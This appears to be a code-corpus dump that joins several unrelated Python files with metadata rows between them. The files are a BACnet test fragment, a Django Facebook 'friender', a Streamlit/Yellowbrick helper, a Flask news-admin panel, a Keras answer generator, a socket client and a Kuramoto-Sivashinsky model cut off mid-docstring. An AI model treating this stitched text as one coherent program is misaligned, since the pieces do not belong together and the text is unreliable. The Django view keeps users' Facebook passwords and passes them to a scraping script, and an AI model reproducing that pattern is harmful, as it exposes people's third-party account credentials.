TestBinaryValueThread._debug("__init__ %r", interval) Thread.__init__(self) # runs as a daemon self.daemon = True # save the interval self.interval = interval # make a list of test values self.test_values = [True, False] def run(self): if _debug: TestBinaryValueThread._debug("run") global test_bv while True: # pop the next value next_value = self.test_values.pop(0) self.test_values.append(next_value) if _debug: TestBinaryValueThread._debug(" - next_value: %r", next_value) # change the point test_bv.presentValue = next_value # sleep time.sleep(self.interval) def main(): global test_av, test_bv, test_application # make a parser parser = ConfigArgumentParser(description=__doc__) parser.add_argument("--console", action="store_true", default=False, help="create a console", ) # analog value task and thread parser.add_argument("--avtask", type=float, help="analog value recurring task", ) parser.add_argument("--avthread", type=float, help="analog value thread", ) # analog value task and thread parser.add_argument("--bvtask", type=float, help="binary value recurring task", ) parser.add_argument("--bvthread", type=float, help="binary value thread", ) # provide a different spin value parser.add_argument("--spin", type=float, help="spin time", default=1.0, ) # parse the command line arguments args = parser.parse_args() if _debug: _log.debug("initialization") if _debug: _log.debug(" - args: %r", args) # make a device object this_device = LocalDeviceObject(ini=args.ini) if _debug: _log.debug(" - this_device: %r", this_device) # make a sample application test_application = SubscribeCOVApplication(this_device, args.ini.address) # make an analog value object test_av = AnalogValueObject( objectIdentifier=('analogValue', 1), objectName='av', presentValue=0.0, statusFlags=[0, 0, 0, 0], covIncrement=1.0, ) _log.debug(" - test_av: %r", test_av) # add it to the device test_application.add_object(test_av) _log.debug(" - object list: %r", this_device.objectList) # make a binary value object test_bv = BinaryValueObject( objectIdentifier=('binaryValue', 1), objectName='bv', presentValue='inactive', statusFlags=[0, 0, 0, 0], ) _log.debug(" - test_bv: %r", test_bv) # add it to the device test_application.add_object(test_bv) # make a console if args.console: test_console = COVConsoleCmd() _log.debug(" - test_console: %r", test_console) # enable sleeping will help with threads enable_sleeping() # analog value task if args.avtask: test_av_task = TestAnalogValueTask(args.avtask) test_av_task.install_task() # analog value thread if args.avthread: test_av_thread = TestAnalogValueThread(args.avthread) deferred(test_av_thread.start) # binary value task if args.bvtask: test_bv_task = TestBinaryValueTask(args.bvtask) test_bv_task.install_task() # binary value thread if args.bvthread: test_bv_thread = TestBinaryValueThread(args.bvthread) deferred(test_bv_thread.start) _log.debug("running") run(args.spin) _log.debug("fini") if __name__ == "__main__": main()
30.354691
87
0.618168
9,271
0.698907
0
0
9,391
0.707953
0
0
3,533
0.26634
4c32edf19e346b501323693f4025d8d4782f7d64
973
py
Python
server/glassface/facebookfriender/views.py
theopak/glassface
bcb6c02636bda069d604a4da1dd09222e99be356
[ "MIT" ]
1
2017-02-24T16:18:24.000Z
2017-02-24T16:18:24.000Z
server/glassface/facebookfriender/views.py
theopak/glassface
bcb6c02636bda069d604a4da1dd09222e99be356
[ "MIT" ]
null
null
null
server/glassface/facebookfriender/views.py
theopak/glassface
bcb6c02636bda069d604a4da1dd09222e99be356
[ "MIT" ]
null
null
null
import os import platform import subprocess from django.http import HttpResponse from django.conf import settings def add(request, friend): phantomjs = os.path.join(settings.PROJECT_PATH, 'glassface', 'facebookfriender', platform.system(), 'phantomjs') script = os.path.join(settings.PROJECT_PATH, 'glassface', 'facebookfriender', 'facebookfriender.js') try: subprocess.call([phantomjs, script, friend, request.user.get_profile().facebook_email, request.user.get_profile().facebook_pass]) except: return False return True def extract(request): phantomjs = os.path.join(settings.PROJECT_PATH, 'glassface', 'facebookfriender', platform.system(), 'phantomjs') script = os.path.join(settings.PROJECT_PATH, 'glassface', 'facebookfriender', 'useridextractor.js') print "sexy" out = subprocess.check_output([phantomjs, script, request.POST['email'], request.POST['password']]) print out return "user id goes here"
38.92
137
0.732785
0
0
0
0
0
0
0
0
221
0.227133
4c330026016ced54e01a326234695f3fe1fb584f
5,187
py
Python
fancylit/modeling/yellowbrick_funcs.py
rubyruins/fancylit
56a7cdfe78edd687a3b318bbbfa534203de1ace8
[ "Apache-2.0" ]
null
null
null
fancylit/modeling/yellowbrick_funcs.py
rubyruins/fancylit
56a7cdfe78edd687a3b318bbbfa534203de1ace8
[ "Apache-2.0" ]
null
null
null
fancylit/modeling/yellowbrick_funcs.py
rubyruins/fancylit
56a7cdfe78edd687a3b318bbbfa534203de1ace8
[ "Apache-2.0" ]
null
null
null
import random import numpy as np import pandas as pd import streamlit as st from sklearn.naive_bayes import GaussianNB from sklearn.model_selection import train_test_split from yellowbrick.classifier import classification_report from yellowbrick.target import FeatureCorrelation from yellowbrick.target import ClassBalance from streamlit_yellowbrick import st_yellowbrick from typing import Any, List, Tuple import plotly.express as px def data_prep(df: pd.DataFrame) -> Tuple[List, List, List, List]: """ Purpose: Prep data for modeling Args: df - Pandas dataframe Returns: test_features - test set features train_features - train set feautres test_target - test set target train_target - train set target """ # Specify the target classes target_string = st.selectbox("Select Target Column", df.columns) target = np.array(df[target_string]) # Select Features you want feature_cols = st.multiselect("Select Modeling Features", df.columns) # Get all features features = df[feature_cols] featurestmp = np.array(features) feats = [] # find all bad rows for index, featarr in enumerate(featurestmp): try: featarr = featarr.astype(float) feats.append(featarr) except Exception as error: st.error(error) st.error(featarr) st.stop() featuresarr = np.array(feats) # Split Data randInt = random.randint(1, 200) ( test_features, train_features, test_target, train_target, ) = train_test_split(featuresarr, target, test_size=0.75, random_state=randInt) return ( test_features, train_features, test_target, train_target, ) def show_classification_report( df: pd.DataFrame, ) -> None: """ Purpose: Renders a classification_report Args: df - Pandas dataframe Returns: N/A """ # Prep data for model training ( test_features, train_features, test_target, train_target, ) = data_prep(df) if st.button("Train Model"): st.header("Classification Report") st.markdown( "The classification report visualizer displays the precision, recall, F1, and support scores for the model. In order to support easier interpretation and problem detection, the report integrates numerical scores with a color-coded heatmap. All heatmaps are in the range (0.0, 1.0) to facilitate easy comparison of classification models across different classification reports." ) # Instantiate the visualizer visualizer = classification_report( GaussianNB(), train_features, train_target, test_features, test_target, support=True, ) # Get the viz fig = visualizer.fig ax = visualizer.show() fig.axes.append(ax) # show the viz st.write(fig) # TODO download model, Download report # TODO live predictions def feature_correlation(df: pd.DataFrame) -> None: """ Purpose: Renders a feature correlation graph Args: df - Pandas dataframe Returns: N/A """ target_string = st.selectbox("Select Target Column", df.columns, key="selectbox-feature-correlation") residual_cols = [col for col in df.columns if col != target_string and df[col].dtype != "object"] feature_cols = st.multiselect("Select Modeling Features", residual_cols, key="multiselect-feature-correlation", default=residual_cols[:5]) if str(df[target_string].dtype) == "object": method = 'mutual_info-classification' else: type_problem = st.selectbox("Select the type of problem", ['classification', 'regression']) if type_problem == 'classification': method = st.selectbox("Select the correlation method", ['mutual_info-classification', 'pearson']) else: method = st.selectbox("Select the correlation method", ['mutual_info-regression', 'pearson']) try: viz = FeatureCorrelation(method=method, feature_names=feature_cols, sort=True) viz.fit(df[feature_cols], df[target_string]) fig = px.bar(x=viz.scores_, y=viz.features_, title="Feature Correlation") st.plotly_chart(fig) except : st.warning("Verify the type of problem that you select") def class_balance(df: pd.DataFrame) -> None: """ Purpose: Renders a class balance graph Args: df - Pandas dataframe Returns: N/A """ classes = st.selectbox("Select Class Column", df.columns, index = len(df.columns) - 1) visualizer = ClassBalance(labels = df[classes].unique()) visualizer.fit(df[classes]) st_yellowbrick(visualizer)
30.511765
389
0.614035
0
0
0
0
0
0
0
0
1,818
0.350492
4c33dde47e4450a45e6aa5280d3a4d98189d8d33
14,566
py
Python
info/modules/admin/views.py
moonbria/test1
05893bd91d416ca4093e4619ede427434fa665cc
[ "MIT" ]
null
null
null
info/modules/admin/views.py
moonbria/test1
05893bd91d416ca4093e4619ede427434fa665cc
[ "MIT" ]
null
null
null
info/modules/admin/views.py
moonbria/test1
05893bd91d416ca4093e4619ede427434fa665cc
[ "MIT" ]
null
null
null
from flask import request import random import re from flask import current_app, jsonify from flask import g from flask import make_response from flask import redirect from flask import render_template from flask import request from flask import session from flask import url_for import time from info import constants, db from info import redis_store from info.lib.yuntongxun.sms import CCP from info.utils.captcha.captcha import captcha from info.utils.image_storage import storage from info.utils.response_code import RET from info.modules.passport import passport_blu from info.models import User, Category, News from info.modules.profile import profile_blu from info.utils.common import user_login_data from datetime import datetime, timedelta from . import admin_blu @admin_blu.route("/login", methods=["GET", "POST"]) def admin_login(): if request.method == "GET": # 去session 中取到指定的值 user_id = session.get("user_id", None) is_admin = session.get("is_admin", False) if user_id and is_admin: return redirect(url_for("admin_index")) return render_template("admin/login.html") # 取到登陆的参数 username = request.form.get("username") password = request.form.get("password") if not all([username, password]): return render_template("admin/login.html", errmsg="参数错误") try: user = User.query.filter(User.mobile == username).first() except Exception as e: current_app.logger.error(e) return render_template("admin/login.html", errmsg="数据错误") if not user: return render_template("admin/login.html", errmsg="用户名错误") if not user.check_password(password): return render_template("admin/login.html", errmsg="密码错误") if not user.is_admin: return render_template("admin/login.html", errmsg="用户不是管理员") session["user_id"] = user.id session["nick_name"] = user.nick_name session["mobile"] = user.mobile session["is_admin"] = True # 跳转到后台管理主页,暂未实现 return redirect(url_for("admin.admin_index")) @admin_blu.route("/index") @user_login_data def admin_index(): user = g.user return render_template("admin/index.html", user=user.to_dict()) @admin_blu.before_request def before_request(): # 判断如果不是登陆页面的请求 if not request.url.endswith(url_for("admin.admin_login")): user_id = session.get("user_id") is_admin = session.get("is_admin", False) if not user_id or not is_admin: # 判断当前是否有用户登陆,或者是否是管理员,如果不是,直接重定向到项目首页 return redirect("/") @admin_blu.route("/user_count") def user_count(): # 查询总人数 total_count = 0 try: total_count = User.query.filter(User.is_admin == False).count() except Exception as e: current_app.logger.error(e) # 查询月新增数 mon_count = 0 try: now = time.localtime() mon_begin = "%d-%02d-01" % (now.tm_year, now.tm_mon) mon_begin_date = datetime.strptime(mon_begin, "%Y-%m-%d") mon_count = User.query.filter(User.is_admin==False, User.create_time > mon_begin_date).count() except Exception as e: current_app.logger.error(e) day_count = 0 try: day_begin = "%d-%02d-%02d" % (now.tm_year, now.tm_mon, now.tm_mday) day_begin_date = datetime.strptime(day_begin, "%Y-%m-%d") day_count = User.query.filter(User.is_admin==False, User.create_time >= day_begin_date).count() except Exception as e: current_app.logger.error(e) # 查询图表信息 # 获取到当天00:00:00时间 now_date = datetime.strptime(datetime.now().strftime("%Y-%m-%d"), "%Y-%m-%d") print(now_date) # 定义空数组,保存数据 active_date = list() active_count = list() # 依次添加数据,再反转 for i in range(0, 31): begin_date = now_date - timedelta(days=i) end_date = now_date - timedelta(days=(i - 1)) active_date.append(begin_date.strftime("%Y-%m-%d")) count = 0 try: count = User.query.filter(User.is_admin == False, User.last_login >= begin_date, User.last_login < end_date).count() print(count) except Exception as e: current_app.logger.error(e) active_count.append(count) active_date.reverse() active_count.reverse() data = {"total_count": total_count, "mon_count": mon_count, "day_count": day_count, "active_date": active_date, "active_count": active_count} return render_template("admin/user_count.html", data=data) @admin_blu.route("/user_list") def user_list(): """获取用户列表""" # 获取参数 page = request.args.get("p", 1) try: print(page) page = int(page) except Exception as e: current_app.logger.error(e) page = 1 # 设置变量默认值 users = [] current_page = 1 total_page = 1 #查询数据 try: paginate = User.query.filter(User.is_admin == False)\ .order_by(User.last_login.desc())\ .paginate(page, constants.ADMIN_NEWS_PAGE_MAX_COUNT, False) users = paginate.items current_page = paginate.page total_page = paginate.pages except Exception as e: current_app.logger.error(e) # 将模型列表转换成字典列表 users_list = [] for user in users: users_list.append(user.to_admin_dict()) context = { "total_page": total_page, "current_page": current_page, "users": users_list } return render_template("admin/user_list.html", data=context) @admin_blu.route("/news_review") def news_review(): """返回待审核新闻列表""" page = request.args.get("p", 1) keywords = request.args.get("keywords", "") try: page = int(page) except Exception as e: current_app.logger.error(e) page = 1 news_list = list() current_page = 1 total_page = 1 try: filters = [News.status != 0] # 如果有关键词 if keywords: # 添加关键字检索选项 filters.append(News.title.contains(keywords)) paginate = News.query.filter(*filters)\ .order_by(News.create_time.desc())\ .paginate(page, constants.ADMIN_NEWS_PAGE_MAX_COUNT, False) news_list = paginate.items current_page = paginate.page total_page = paginate.pages except Exception as e: current_app.error(e) news_dict_list = list() for news in news_list: news_dict_list.append(news.to_review_dict()) data = { "total_page": total_page, "current_page": current_page, "news_list": news_dict_list } return render_template("admin/news_review.html", data=data) @admin_blu.route("/news_review_detail", methods=["GET", "POST"]) def news_review_detail(): """新闻审核""" # 获取新闻id if request.method == "GET": news_id = request.args.get("news_id") if not news_id: data = { "errmsg": "未查询到数据" } return render_template("admin/news_review_detail.html", data=data) # 通过id查询新闻 news = None try: news = News.query.get(news_id) except Exception as e: current_app.logger.error(e) if not news: data = { "errmsg": "未查询到数据" } return render_template("admin/news_review_detail.html", data=data) # 返回数据 data = { "news": news.to_dict() } return render_template("admin/news_review_detail.html", data=data) # 执行审核操作 # 1. 获取参数 news_id = request.json.get("news_id") action = request.json.get("action") #2. 判断参数 if not all([news_id, action]): return jsonify(errno=RET.PARAMERR, errmsg="参数错误") if action not in ("accept", "reject"): return jsonify(errno=RET.PARAMERR, errmsg="参数错误") news = None try: # 3. 查询新闻 news = News.query.get(news_id) except Exception as e: current_app.logger.error(e) if not news: return jsonify(errno=RET.NODATA, errmsg="未查询到数据") if action == "accept": news.status = 0 else: # 拒绝通过,需要获取原因 reason = request.json.get("reason") if not reason: return jsonify(errno=RET.PARAMERR, errmsg="参数错误") news.reason = reason news.status = -1 # 保存数据库 try: db.session.commit() except Exception as e: current_app.logger.error(e) db.session.rollback() return jsonify(errno=RET.DBERR, errmsg="保存数据失败") return jsonify(errno=RET.OK, errmsg="操作成功") @admin_blu.route("/news_edit", methods=["GET", "POST"]) def news_edit(): """返回新闻列表""" page = request.args.get("p", "1") print(page) a = re.match(r"^\d*", page) b = re.findall(r"""keywords=(\w*)""", page) print(b) page = a.group() if b != []: b = b[0] keywords = b else: keywords = None b = "" try: page = int(page) except Exception as e: current_app.logger.error(e) page = 1 news_list = list() current_page = 1 total_page = 1 try: filters = list() # 如果有关键词 if keywords: # 添加关键词的检索选项 filters.append(News.title.contains(keywords)) # 查询 paginate = News.query.filter(*filters)\ .order_by(News.create_time.desc())\ .paginate(page, constants.ADMIN_NEWS_PAGE_MAX_COUNT, False) news_list = paginate.items current_page = paginate.page total_page = paginate.pages except Exception as e: current_app.logger.error(e) news_dict_list = list() for news in news_list: news_dict_list.append(news.to_basic_dict()) data = { "total_page": total_page, "current_page": current_page, "new_list": news_dict_list, "last_input": b } if request.method == "GET": return render_template("admin/news_edit.html", data=data) # return jsonify(errno=RET.OK, errmsg="OK") return render_template("admin/news_edit.html", data=data) @admin_blu.route("/news_edit_detail", methods=["GET", "POST"]) def news_edit_detail(): """新闻编辑详情""" if request.method == "GET": # 获取参数 news_id = request.args.get("news_id") if not news_id: data = { "errmsg": "没有找到新闻" } return render_template("admin/news_edit_detail.html", data=data) # 查询新闻 news = None try: news = News.query.get(news_id) except Exception as e: current_app.logger.error(e) if not news: data = { "errmsg": "没有找到新闻" } return render_template("admin/news_edit_detail.html", data=data) categories = Category.query.all() categories_li = [] for category in categories: c_dict = category.to_dict() c_dict["is_selected"] = False if category.id == News.category_id: c_dict["is_selected"] = True categories_li.append(c_dict) # 移除最新分类 categories_li.pop(0) data = { "news": news.to_dict(), "categories": categories_li } return render_template("admin/news_edit_detail.html", data=data) news_id = request.form.get("news_id") title = request.form.get("title") digest= request.form.get("digest") content = request.form.get("content") index_image = request.form.get("index-image") categery_id = request.form.get("category_id") # 1.1 判断数据是否有值: if not all([title, digest, content, categery_id]): return jsonify(errno=RET.PARAMERR, errmsg="参数有误") print(title, digest, content, categery_id) news = None try: news = News.query.get(news_id) except Exception as e: current_app.logger.error(e) if not news: return jsonify(errno=RET.NODATA, errmsg="未找到新闻数据") # 1.2 尝试读取图片 if index_image: try: index_image = index_image.read() except Exception as e: return jsonify(errno=RET.PARAMERR, errmsg="参数有误") # 2. 将标题图片上传到七牛 try: key = storage(index_image) except Exception as e: current_app.logger.error(e) return jsonify(errno=RET.THIRDERR, errmsg="上传图片错误") news.index_image_url = constants.QINIU_DOMIN_PREFIX + key # 3. 设置相关数据 news.title = title news.digest = digest news.content = content news.category_id = categery_id # 4. 保存到数据库 try: db.session.commit() except Exception as e: current_app.logger.error(e) db.session.rollback() return jsonify(errno=RET.DBERR, errmsg="保存数据失败") # 5. 返回结果 return jsonify(errno=RET.OK, errmsg="编辑成功") @admin_blu.route("/news_category") def get_news_category(): # 获取所有的分类数据 categories = Category.query.all() # 定义列表保存分类数据 categories_dicts = [] for category in categories: # 获取字典 cate_dict = category.to_dict() # 拼接内容 categories_dicts.append(cate_dict) categories_dicts.pop(0) # 返回内容 data = { "categories": categories_dicts } return render_template("admin/news_type.html", data=data) @admin_blu.route("/add_category", methods=["POST"]) def add_category(): """修改或者添加分类""" category_id = request.json.get("id") category_name = request.json.get("name") print(category_name) if not category_name: return jsonify(errno=RET.PARAMERR, errmsg="参数错误") # 判断是否有分类id if category_id: try: category = Category.query.get(category_id) except Exception as e: current_app.logger.error(e) return jsonify(errno=RET.DBERR, errmsg="查询数据失败") if not category: return jsonify(errno=RET.NODATA, errmsg="未查询到分类信息") category.name = category_name return jsonify(errno=RET.OK, errmsg="保存数据成功") else: # 如果没有分类id, 添加分类 try: new_category = Category() new_category.id = category_id new_category.name = category_name db.session.add(new_category) db.session.commit() except Exception as e: current_app.logger.error(e) db.session.rollback() return jsonify(errno=RET.DBERR, errmsg="保存数据失败") return jsonify(errno=RET.OK, errmsg="保存数据成功")
28.729783
87
0.604696
0
0
0
0
14,794
0.948212
0
0
3,167
0.202987
4c3438c0b1046ec22f1ab42437a0d08677dfe6f2
2,839
py
Python
src/predict_model.py
Swati17293/outlet-prediction
3c1f41b88d71b5247763bacc9dbc1abf5d0619a2
[ "MIT" ]
1
2020-10-28T00:05:31.000Z
2020-10-28T00:05:31.000Z
src/predict_model.py
Swati17293/outlet-prediction
3c1f41b88d71b5247763bacc9dbc1abf5d0619a2
[ "MIT" ]
null
null
null
src/predict_model.py
Swati17293/outlet-prediction
3c1f41b88d71b5247763bacc9dbc1abf5d0619a2
[ "MIT" ]
1
2021-12-09T14:36:54.000Z
2021-12-09T14:36:54.000Z
#Answer Generation import csv import os import numpy as np from keras.models import * from keras.models import Model from keras.preprocessing import text def load_model(): print('\nLoading model...') # load json and create model json_file = open('models/MODEL.json', 'r') loaded_model_json = json_file.read() json_file.close() gate_model = model_from_json(loaded_model_json) # load weights into new model gate_model.load_weights('models/MODEL.h5', by_name=True) return gate_model train_ans, anslist = [], [] def ans_vec(): anslist = [] dataset = ['Train'] for data in dataset: f = open('data/raw/' + data + '.csv') lines = csv.reader(f) for line in lines: source_uri = line[4] anslist.append(source_uri) f.close() return anslist def generate_save_ans(): dic = 3 anslist = ans_vec() gate_model = load_model() test_title_feature = np.load('data/vectorized/Test_title.npy') test_summary_feature = np.load('data/vectorized/Test_summary.npy') tokenizer_a = text.Tokenizer(num_words=dic+1) tokenizer_a.fit_on_texts(anslist) dic_a = tokenizer_a.word_index ind_a ={value:key for key, value in dic_a.items()} num_test = len(open('data/raw/Test.csv', 'r').readlines()) ans = gate_model.predict([ test_title_feature, test_summary_feature]) fp = open('reports/Test.ans', 'w') for h in range(num_test): i = h if np.argmax(ans[i][0],axis=0) == 0: fp.write('indiatimes\n') #Low frequency words are replaced with "indiatimes" else: for j in range(dic): an = np.argmax(ans[i][j],axis=0) if j != dic-1: anext = np.argmax(ans[i][j+1],axis=0) if an != 0 and anext != 0: #Words before and after if an == anext: fp.write('') #Delete duplicate words else: fp.write(ind_a[an] + ' ') elif an != 0 and anext == 0: fp.write(ind_a[an]) elif an == 0 and anext != 0: fp.write(ind_a[anext]) else: fp.write('') else: if an != 0: fp.write(ind_a[an] + '\n') else: fp.write('\n') fp.close() def main(): load_model() print('\n\nGenerating answers...') if os.path.exists('reports') == False: os.mkdir('reports') if os.path.isfile('reports/Test.ans') == False: generate_save_ans() print('\nAnswer generation complete...\n\n') if __name__ == "__main__": main()
27.038095
89
0.534343
0
0
0
0
0
0
0
0
503
0.177175
4c353955c991e91d2a8ac820fc6be7fa23bb7348
716
py
Python
tools/client.py
Alisa1114/yolov4-pytorch-1
5dd8768f2eef868c9ee4588818350d4e1b50b98f
[ "MIT" ]
null
null
null
tools/client.py
Alisa1114/yolov4-pytorch-1
5dd8768f2eef868c9ee4588818350d4e1b50b98f
[ "MIT" ]
null
null
null
tools/client.py
Alisa1114/yolov4-pytorch-1
5dd8768f2eef868c9ee4588818350d4e1b50b98f
[ "MIT" ]
null
null
null
# -*- coding: UTF-8 -*- from socket import * def client(): #實驗室電腦 # serverip='120.126.151.182' # serverport=8887 #在自己電腦測試 serverip='127.0.0.1' serverport=8888 client=socket(AF_INET,SOCK_STREAM) client.connect((serverip,serverport)) address_file = open('tools/address.txt', 'r') address = address_file.read() client.send(address.encode()) print(client.recv(1024).decode()) if __name__=='__main__': client() # buffer='POST /post HTTP/1.1\r\n' # buffer+='Content-Type:application/json\r\n' # buffer+='Body:{\\"StuId\\":\\"410785016 Chao,He-Teng\\"}\r\n' # buffer+='Address : ' + address + '\r\n' # buffer+='\r\n' # print(buffer) # message = "國立台北大學世界第一:)"
25.571429
64
0.624302
0
0
0
0
0
0
0
0
410
0.539474
4c35e02888592e1186585689132cd3d10b0f4a6d
13,039
py
Python
dapy/models/kuramoto_sivashinsky.py
hassaniqbal209/data-assimilation
ec52d655395dbed547edf4b4f3df29f017633f1b
[ "MIT" ]
11
2020-07-29T07:46:39.000Z
2022-03-17T01:28:07.000Z
dapy/models/kuramoto_sivashinsky.py
hassaniqbal209/data-assimilation
ec52d655395dbed547edf4b4f3df29f017633f1b
[ "MIT" ]
1
2020-07-14T11:49:17.000Z
2020-07-29T07:43:22.000Z
dapy/models/kuramoto_sivashinsky.py
hassaniqbal209/data-assimilation
ec52d655395dbed547edf4b4f3df29f017633f1b
[ "MIT" ]
10
2020-07-14T11:34:24.000Z
2022-03-07T09:08:12.000Z
"""Non-linear SPDE model on a periodic 1D spatial domain for laminar wave fronts. Based on the Kuramato--Sivashinsky PDE model [1, 2] which exhibits spatio-temporally chaotic dynamics. References: 1. Kuramoto and Tsuzuki. Persistent propagation of concentration waves in dissipative media far from thermal equilibrium. Progress in Theoretical Physcs, 55 (1976) pp. 356–369. 2. Sivashinsky. Nonlinear analysis of hydrodynamic instability in laminar flames I. Derivation of basic equations. Acta Astronomica, 4 (1977) pp. 1177–1206. """ from typing import Union, Optional, Sequence, Callable import numpy as np from dapy.models.base import AbstractDiagonalGaussianModel from dapy.models.spatial import SpatiallyExtendedModelMixIn from dapy.integrators.etdrk4 import FourierETDRK4Integrator from dapy.models.transforms import ( OneDimensionalFourierTransformedDiagonalGaussianModelMixIn, fft, real_array_to_rfft_coeff, rfft_coeff_to_real_array, ) class FourierLaminarFlameModel(AbstractDiagonalGaussianModel): """Non-linear SPDE model on a periodic 1D spatial domain for laminar flame fronts. This model class represents the state field by its the Fourier coefficients rather than values of the state field at the spatial mesh points. Based on the Kuramato--Sivashinsky PDE model [1, 2] which exhibits spatio-temporally chaotic dynamics. The governing stochastic partial differential equation (SPDE) is dX = -(∂⁴X/∂s⁴ + ∂²X/∂s² + X * ∂X/∂s + γ * X) dt + κ ⊛ dW where `s` is the spatial coordinate in a periodic domain `[0, S)`, `t` the time coordinate, `X(s, t)` the state field process, `γ` a coefficient controlling the degree of damping in the dynamics, `W(s, t)` a space-time white noise process, `κ(s)` a spatial smoothing kernel and `⊛` indicates circular convolution in the spatial coordinate. Using a spectral spatial discretisation, this corresponds to a non-linear system of stochastic differential equations (SDEs) in the Fourier coefficients X̃ₖ dX̃ₖ = (ωₖ² - ωₖ⁴ - γ) * X̃ₖ + (i * ωₖ / 2) * DFTₖ(IDFT(X̃)²) + κ̃ₖ * dW̃ₖ where `W̃ₖ` is a complex-valued Wiener process, `κ̃ₖ` the kth Fourier coefficient of the smoothing kernel `κ`, `ωₖ = 2 * pi * k / S` the kth spatial frequency and `i` the imaginary unit. A Fourier-domain exponential time-differencing integrator with 4th order Runge-- Kutta updates for non-linear terms [3, 4] is used to integrate the deterministic component of the SDE dynamics and an Euler-Maruyama discretisation used for the Wiener process increment. The smoothing kernel Fourier coefficients are assumed to be κ̃ₖ = σ * exp(-ωₖ² * ℓ²) * √(M / S) where `σ` is a parameter controlling the amplitude and `ℓ` a parameter controlling the length scale. References: 1. Kuramoto and Tsuzuki. Persistent propagation of concentration waves in dissipative media far from thermal equilibrium. Progress in Theoretical Physcs, 55 (1976) pp. 356–369. 2. Sivashinsky. Nonlinear analysis of hydrodynamic instability in laminar flames I. Derivation of basic equations. Acta Astronomica, 4 (1977) pp. 1177–1206. 3. Kassam, Aly-Khan and Trefethen, Lloyd N. Fourth-order time-stepping for stiff PDEs. SIAM Journal on Scientific Computing 26.4 (2005): 1214-1233. 4. Cox, Steven M. and Matthews, Paul C. Exponential time differencing for stiff systems. Journal of Computational Physics 176.2 (2002): 430-455. """ def __init__( self, dim_state: int = 512, observation_space_indices: Union[slice, Sequence[int]] = slice(4, None, 8), observation_function: Optional[Callable[[np.ndarray, int], np.ndarray]] = None, time_step: float = 0.25, domain_extent: float = 32 * np.pi, damping_coeff: float = 1.0 / 6, observation_noise_std: float = 0.5, initial_state_amplitude: float = 1.0, state_noise_amplitude: float = 1.0, state_noise_length_scale: float = 1.0, num_roots_of_unity_etdrk4_integrator: int = 16, **kwargs ): """ Args: dim_state: Dimension of state which is equivalent here to number of mesh points in spatial discretization. observation_space_indices: Slice or sequence of integers specifying spatial mesh node indices (indices in to state vector) corresponding to observation points. observation_function: Function to apply to subsampled state field to compute mean of observation(s) given state(s) at a given time index. Defaults to identity function in first argument. time_step: Integrator time step. domain_extent: Extent (size) of spatial domain. damping_coeff: Coefficient (`γ` in description above) controlling degree of damping in dynamics. observation_noise_std: Standard deviation of additive Gaussian noise in observations. Either a scalar or array of shape `(dim_observation,)`. Noise in each dimension assumed to be independent i.e. a diagonal noise covariance. initial_state_amplitude: Amplitude scale parameter for initial random state field. Larger values correspond to larger magnitude values for the initial state. state_noise_amplitude: Amplitude scale parameter for additive state noise in model dynamics. Larger values correspond to larger magnitude additive noise in the state field. state_noise_length_scale: Length scale parameter for smoothed noise used to generate initial state and additive state noise fields. Larger values correspond to smoother fields. num_roots_of_unity_etdrk4_integrator: Number of roots of unity to use in approximating contour integrals in exponential time-differencing plus fourth-order Runge Kutta integrator. """ assert dim_state % 2 == 0, "State dimension `dim_state` must be even" self.time_step = time_step self.observation_space_indices = observation_space_indices self.observation_function = observation_function spatial_freqs = np.arange(dim_state // 2 + 1) * 2 * np.pi / domain_extent spatial_freqs_sq = spatial_freqs ** 2 spatial_freqs[dim_state // 2] = 0 state_noise_kernel = ( (time_step) ** 0.5 * state_noise_amplitude * np.exp(-0.5 * spatial_freqs_sq * state_noise_length_scale ** 2) * (dim_state / domain_extent) ** 0.5 ) state_noise_std = rfft_coeff_to_real_array( state_noise_kernel + 1j * state_noise_kernel, False ) initial_state_kernel = ( initial_state_amplitude * np.exp(-0.5 * spatial_freqs_sq * state_noise_length_scale ** 2) * (dim_state / domain_extent) ** 0.5 ) initial_state_std = rfft_coeff_to_real_array( initial_state_kernel + 1j * initial_state_kernel, False ) def linear_operator(freqs, freqs_sq): return freqs_sq - freqs_sq ** 2 - damping_coeff def nonlinear_operator(v, freqs, freqs_sq): return ( -0.5j * freqs * fft.rfft(fft.irfft(v, norm="ortho") ** 2, norm="ortho") ) self.integrator = FourierETDRK4Integrator( linear_operator=linear_operator, nonlinear_operator=nonlinear_operator, num_mesh_point=dim_state, domain_size=domain_extent, time_step=time_step, num_roots_of_unity=num_roots_of_unity_etdrk4_integrator, ) if observation_function is None: dim_observation = np.zeros(dim_state)[observation_space_indices].shape[0] else: dim_observation = observation_function( np.zeros(dim_state)[observation_space_indices], 0 ).shape[0] super().__init__( dim_state=dim_state, dim_observation=dim_observation, initial_state_std=initial_state_std, initial_state_mean=np.zeros(dim_state), state_noise_std=state_noise_std, observation_noise_std=observation_noise_std, **kwargs ) def _next_state_mean(self, states: np.ndarray, t: int) -> np.ndarray: return rfft_coeff_to_real_array( self.integrator.step(real_array_to_rfft_coeff(states)) ) def _observation_mean(self, states: np.ndarray, t: int) -> np.ndarray: subsampled_states = fft.irfft(real_array_to_rfft_coeff(states), norm="ortho")[ ..., self.observation_space_indices ] if self.observation_function is None: return subsampled_states else: return self.observation_function(subsampled_states, t) class SpatialLaminarFlameModel( SpatiallyExtendedModelMixIn, OneDimensionalFourierTransformedDiagonalGaussianModelMixIn, FourierLaminarFlameModel, ): """Non-linear SPDE model on a periodic 1D spatial domain for laminar flame fronts. This model class represents the state field by its values at the spatial mesh points rather than the corresponding Fourier coefficients. For more details see the docstring of `FourierLaminarFlameModel`. """ def __init__( self, dim_state: int = 512, observation_space_indices: Union[slice, Sequence[int]] = slice(4, None, 8), observation_function: Optional[Callable[[np.ndarray, int], np.ndarray]] = None, time_step: float = 0.25, domain_extent: float = 32 * np.pi, damping_coeff: float = 1.0 / 6, observation_noise_std: float = 0.5, initial_state_amplitude: float = 1.0, state_noise_amplitude: float = 1.0, state_noise_length_scale: float = 1.0, num_roots_of_unity_etdrk4_integrator: int = 16, ): """ Args: dim_state: Dimension of state which is equivalent here to number of mesh points in spatial discretization. observation_space_indices: Slice or sequence of integers specifying spatial mesh node indices (indices in to state vector) corresponding to observation points. observation_function: Function to apply to subsampled state field to compute mean of observation(s) given state(s) at a given time index. Defaults to identity function in first argument. time_step: Integrator time step. domain_extent: Extent (size) of spatial domain. damping_coeff: Coefficient (`γ` in description above) controlling degree of damping in dynamics. observation_noise_std: Standard deviation of additive Gaussian noise in observations. Either a scalar or array of shape `(dim_observation,)`. Noise in each dimension assumed to be independent i.e. a diagonal noise covariance. initial_state_amplitude: Amplitude scale parameter for initial random state field. Larger values correspond to larger magnitude values for the initial state. 